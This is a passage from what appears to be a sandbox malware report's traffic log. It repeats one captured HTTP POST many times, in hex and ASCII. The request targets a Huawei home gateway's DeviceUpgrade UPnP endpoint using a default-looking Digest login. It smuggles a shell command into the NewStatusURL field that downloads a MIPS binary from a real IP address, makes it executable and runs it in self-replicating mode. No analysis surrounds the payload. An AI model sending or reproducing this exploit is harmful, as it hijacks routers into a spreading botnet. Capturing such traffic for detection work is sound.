3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 